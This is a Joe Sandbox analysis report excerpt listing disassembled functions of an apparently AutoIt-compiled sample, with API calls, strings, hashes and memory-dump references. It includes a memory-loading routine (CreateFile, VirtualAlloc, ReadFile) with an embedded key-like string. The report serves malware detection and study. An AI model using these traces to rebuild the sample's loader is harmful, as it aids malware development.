Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: c5ec067d24fef55f78927d9406b3ef14b227278de813bcc58aef1364ebcea5ce
Instruction ID: 13cc40922d181e24f18e94405c1b5990521fe766122b97fa18f898588cbca6c3
Opcode Fuzzy Hash: c5ec067d24fef55f78927d9406b3ef14b227278de813bcc58aef1364ebcea5ce
Instruction Fuzzy Hash: E711D031208369BAC714FF64F8529BEB7A4ABF5304F48082DF196570A2CF358A69C752

Uniqueness

Uniqueness Score: -1.00%

Function 0018DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00165222), ref: 0018DBCE
GetFileAttributesW.KERNELBASE(?), ref: 0018DBDD
FindFirstFileW.KERNELBASE(?,?), ref: 0018DBEE
FindClose.KERNEL32(00000000), ref: 0018DBFA

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 349ee09e52d48fc40039ea9e3a32fe9931e0a378abf712e8b2c89ab58f408f8a
Instruction ID: 5e48f3aa2cb15e881530ff6bc6688ba545e74059be4e7eee4e7dbbbc4e2ee290
Opcode Fuzzy Hash: 349ee09e52d48fc40039ea9e3a32fe9931e0a378abf712e8b2c89ab58f408f8a
Instruction Fuzzy Hash: 46F0E530810A10578220BB7CFC0D8AA376D9F06334B10474AF836C24F0EBB05E94CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 0012D730 Relevance: 21.6, APIs: 14, Instructions: 625windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0012D807
timeGetTime.WINMM ref: 0012DA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0012DB28
TranslateMessage.USER32(?), ref: 0012DB7B
DispatchMessageW.USER32(?), ref: 0012DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0012DB9F
Sleep.KERNEL32(0000000A), ref: 0012DBB1

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 88102c795f934aa9fecd52c39816b91e44372fdb5c881b83d95af5d32d8659b4
Instruction ID: 5fbac00f0ab5aa4b80b54d1ab99c312fbbd7cdbe14c26c3f1dcd48437d549485
Opcode Fuzzy Hash: 88102c795f934aa9fecd52c39816b91e44372fdb5c881b83d95af5d32d8659b4
Instruction Fuzzy Hash: CA421230608351EFDB29CF24E894BAAB7F0BF56304F54861DF49987691D770E8A5CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00122CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00122D07
RegisterClassExW.USER32(00000030), ref: 00122D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00122D42
InitCommonControlsEx.COMCTL32(?), ref: 00122D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00122D6F
LoadIconW.USER32(000000A9), ref: 00122D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00122D94

Strings

TaskbarCreated, xrefs: 00122D37
0, xrefs: 00122CE9
+, xrefs: 00122CF0
AutoIt v3 GUI, xrefs: 00122D23

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 815abbf8c29f38405c78b3f812b25213b98634304f556c88481c48e2cd4faff1
Instruction ID: 480ce2e535d55373855baa6a6b56fa9c8e3af5b7d9707089fa7b93dd1da49f4c
Opcode Fuzzy Hash: 815abbf8c29f38405c78b3f812b25213b98634304f556c88481c48e2cd4faff1
Instruction Fuzzy Hash: F821C2B5911318EFDB00DFA4ED89BEDBBB8FB48704F10821AF551A66A0D7B14584CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0016065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0016039A: CreateFileW.KERNELBASE(00000000,00000000,?,00160704,?,?,00000000,?,00160704,00000000,0000000C), ref: 001603B7

GetLastError.KERNEL32 ref: 0016076F
__dosmaperr.LIBCMT ref: 00160776
GetFileType.KERNELBASE(00000000), ref: 00160782
GetLastError.KERNEL32 ref: 0016078C
__dosmaperr.LIBCMT ref: 00160795
CloseHandle.KERNEL32(00000000), ref: 001607B5
CloseHandle.KERNEL32(?), ref: 001608FF
GetLastError.KERNEL32 ref: 00160931
__dosmaperr.LIBCMT ref: 00160938

Strings

H, xrefs: 001608BD

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 335d69e18a42338af309658d0e42e819a123c4dea79ca9814d676ad39775d564
Instruction ID: e2867b5e823ceb5364be7310ed73f231896a4592033f1823b48f3e161ed94cb8
Opcode Fuzzy Hash: 335d69e18a42338af309658d0e42e819a123c4dea79ca9814d676ad39775d564
Instruction Fuzzy Hash: B9A11432A141048FDF1AEF68DC51BAE7BA1AB5A320F14015DF8159B3E2DB319D62CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0012344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00123A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001F1418,?,00122E7F,?,?,?,00000000), ref: 00123A78

Part of subcall function 00123357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00123379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0012356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0016318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001631CE
RegCloseKey.ADVAPI32(?), ref: 00163210
_wcslen.LIBCMT ref: 00163277
_wcslen.LIBCMT ref: 00163286

Strings

\Include\, xrefs: 00123527
Software\AutoIt v3\AutoIt, xrefs: 00123560
\, xrefs: 0016328C
Include, xrefs: 00163184, 001631C5

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 3428f2b30c70bfbd5a3e1dd3f3e296dc787c0a1326c25d27c72d090a683fc91a
Instruction ID: 84fee739e0e0532ad9546320e908a0b8789c5f48a9eaf749980263bed34c074d
Opcode Fuzzy Hash: 3428f2b30c70bfbd5a3e1dd3f3e296dc787c0a1326c25d27c72d090a683fc91a
Instruction Fuzzy Hash: 3771D2B15043059FC314EF29EC819ABBBE8FFA8340F40042EF555D71A0EB349A99CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00122B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00122B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00122B9D
LoadIconW.USER32(00000063), ref: 00122BB3
LoadIconW.USER32(000000A4), ref: 00122BC5
LoadIconW.USER32(000000A2), ref: 00122BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00122BEF
RegisterClassExW.USER32(?), ref: 00122C40

Part of subcall function 00122CD4: GetSysColorBrush.USER32(0000000F), ref: 00122D07
Part of subcall function 00122CD4: RegisterClassExW.USER32(00000030), ref: 00122D31
Part of subcall function 00122CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00122D42
Part of subcall function 00122CD4: InitCommonControlsEx.COMCTL32(?), ref: 00122D5F
Part of subcall function 00122CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00122D6F
Part of subcall function 00122CD4: LoadIconW.USER32(000000A9), ref: 00122D85
Part of subcall function 00122CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00122D94

Strings

AutoIt v3, xrefs: 00122C2F
#, xrefs: 00122C16
0, xrefs: 00122C0F

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: ba04e8aa6ee6eac30aa7a3d7cca2afc11f116d722b8e9a7c0c7afb80d731c398
Instruction ID: 85aa39fef47288882a148a41836c28f3d7f06b0d1506231f1fdecd2b003aa786
Opcode Fuzzy Hash: ba04e8aa6ee6eac30aa7a3d7cca2afc11f116d722b8e9a7c0c7afb80d731c398
Instruction Fuzzy Hash: 80212C70E00315FBDB109FA6EC95AAD7FB4FB88B60F04011AF500A6AA0D7B10594CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00123170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0012316A,?,?), ref: 001231D8
KillTimer.USER32(?,00000001,?,?,?,?,?,0012316A,?,?), ref: 00123204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00123227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0012316A,?,?), ref: 00123232
CreatePopupMenu.USER32 ref: 00123246
PostQuitMessage.USER32(00000000), ref: 00123267

Strings

TaskbarCreated, xrefs: 0012322D

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 31a55b47dde2adaef650a900c8b873234807fb202c2701b1ea52b66d2daeff92
Instruction ID: 291bce9eff0b27c3defed53c1ff5859bbd2e7c4aa8a35430d3d987ecf08964ed
Opcode Fuzzy Hash: 31a55b47dde2adaef650a900c8b873234807fb202c2701b1ea52b66d2daeff92
Instruction Fuzzy Hash: 3E413B35200228FBDB186B78BD4DB79362AF745354F040125F962965E2CB7ACAB0D7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00158D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8cf4da4036c47451ef3e5cece44c3f306d3c921825e06e104aa6a5631dcb9ee
Instruction ID: e72b5d31b90dc5c5c93123d00e18b0622770a067d4a968b928959273cbc374bb
Opcode Fuzzy Hash: a8cf4da4036c47451ef3e5cece44c3f306d3c921825e06e104aa6a5631dcb9ee
Instruction Fuzzy Hash: 24C1F074A04249EFCF11DFA8C845BADBBB4AF19311F044199FC25AB3D2C770994ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 023C0920 Relevance: 10.7, APIs: 7, Instructions: 185
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 023C0965

Memory Dump Source

Source File: 00000000.00000002.2976070733.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23c0000_PsBygexGwH.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 28aa79915beb11918698720707ebb43b2bda4a086287e743706ae16bd51aa008
Instruction ID: 07033d5dccfab08ba3d5a91132893904e627711605aa2837f67cb1d6a61a6f1b
Opcode Fuzzy Hash: 28aa79915beb11918698720707ebb43b2bda4a086287e743706ae16bd51aa008
Instruction Fuzzy Hash: CD71FC75A10248EBDF24DFA4CC85FEEB779BF48714F208558F605AB280DB74AA40CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00122C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00122C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00122CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00121CAD,?), ref: 00122CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00121CAD,?), ref: 00122CCF

Strings

AutoIt v3, xrefs: 00122C89, 00122C8E, 00122C8F
edit, xrefs: 00122CAC

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: ace82385f5488bcfa71296f5abba497f9e4d00dc6c1893268961c59306a7d952
Instruction ID: 5eab2cee4c423bb354819f6269661f77e76eb08a54ed3a1bac902bbf8a10c4f1
Opcode Fuzzy Hash: ace82385f5488bcfa71296f5abba497f9e4d00dc6c1893268961c59306a7d952
Instruction Fuzzy Hash: 91F0DA76540290BAEB315717AC08EB73EBDE7C7F70B00005AF900A69A0C7611890DAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00192947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00192C05
DeleteFileW.KERNEL32(?), ref: 00192C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00192C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00192CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00192CC0

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: a1ad76520c8a1e5f6d2548ce2d50defd7b2eeaeeffbee3e8045fad025532bc1c
Instruction ID: d8b29561e1ecd41e3f52b3fa672c0e86defac5d2111bc45b5a77fb8540989197
Opcode Fuzzy Hash: a1ad76520c8a1e5f6d2548ce2d50defd7b2eeaeeffbee3e8045fad025532bc1c
Instruction Fuzzy Hash: 20B13B72D00129ABDF25DBA4DC85EDEBBBDEF58350F1040A6F609E7151EB309A448FA1

Uniqueness

Uniqueness Score: -1.00%

Function 023C24E0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 023C266E
VirtualAlloc.KERNELBASE(00000000,000000FF,00003000,00000004), ref: 023C26A3
ReadFile.KERNELBASE(000000FF,00000000,000000FF,?,00000000), ref: 023C26C9

Strings

L996HVADYISIR4Z8GA81UYRKXT6BJ, xrefs: 023C26EE, 023C26F1

Memory Dump Source

Source File: 00000000.00000002.2976070733.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23c0000_PsBygexGwH.jbxd

Similarity

API ID: File$AllocCreateReadVirtual
String ID: L996HVADYISIR4Z8GA81UYRKXT6BJ
API String ID: 3585551309-3741869921
Opcode ID: 223d3a0e558cf1e14d9db6624e69493ee5cc66646a8d59d76d9becf7921142b4
Instruction ID: 84b9219becea7006ca04f5eacfe88400430be1c9714d2a689f62b2473d9899ac
Opcode Fuzzy Hash: 223d3a0e558cf1e14d9db6624e69493ee5cc66646a8d59d76d9becf7921142b4
Instruction Fuzzy Hash: 1E719030D04288DAEF11DBB4D844BEFBA79AF15304F14419CE6487B2C1DBB95E49CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00123B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00123B0F,SwapMouseButtons,00000004,?), ref: 00123B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00123B0F,SwapMouseButtons,00000004,?), ref: 00123B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00123B0F,SwapMouseButtons,00000004,?), ref: 00123B83

Strings

Control Panel\Mouse, xrefs: 00123B3E

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: e583932c248aa248c76e4ec7d314b301e5e7abe0d5d245e2b1ed4498982fe0b0
Instruction ID: 45fc9ff7657e97da407cd8c8547456f9f5ca79b6e30e46ce7e1b32c8e6cdede6
Opcode Fuzzy Hash: e583932c248aa248c76e4ec7d314b301e5e7abe0d5d245e2b1ed4498982fe0b0
Instruction Fuzzy Hash: 351127B5611228FFDB218FA5EC84AAEBBB8EF44744B10856AB815D7110E3359E509BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0012DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 001732B7

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 31c704c522bd5d6418efc8a6160c09e361c9249ccc5161db33b8ea2653ed37f7
Instruction ID: 91be284f43a6cc90404edfc8d11892a8c24896b78dc959c8e5649198bedb7b42
Opcode Fuzzy Hash: 31c704c522bd5d6418efc8a6160c09e361c9249ccc5161db33b8ea2653ed37f7
Instruction Fuzzy Hash: AFC28C75A00224CFCB24CF98E884AADB7F1FF18310F258169E955AB391D371EDA1CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00123923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001633A2

Part of subcall function 00126B57: _wcslen.LIBCMT ref: 00126B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00123A04

Strings

Line: , xrefs: 001633EB

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: f770c30e9dbb4b364f6d19f19c32aa76246f84ddd797257594d2682d9ff743f4
Instruction ID: e83c38368b6dd7e06ab5588a24c17b175ecad22ea313d46b77a404ec4c44a535
Opcode Fuzzy Hash: f770c30e9dbb4b364f6d19f19c32aa76246f84ddd797257594d2682d9ff743f4
Instruction Fuzzy Hash: 7531F471508324ABC725EB20EC45FEBB3D8BF55324F00092AF5A9835D1DB749AA9C7C2

Uniqueness

Uniqueness Score: -1.00%

Function 0013FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00140668

Part of subcall function 001432A4: RaiseException.KERNEL32(?,?,?,0014068A,?,001F1444,?,?,?,?,?,?,0014068A,00121129,001E8738,00121129), ref: 00143304

__CxxThrowException@8.LIBVCRUNTIME ref: 00140685

Strings

Unknown exception, xrefs: 00140692

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
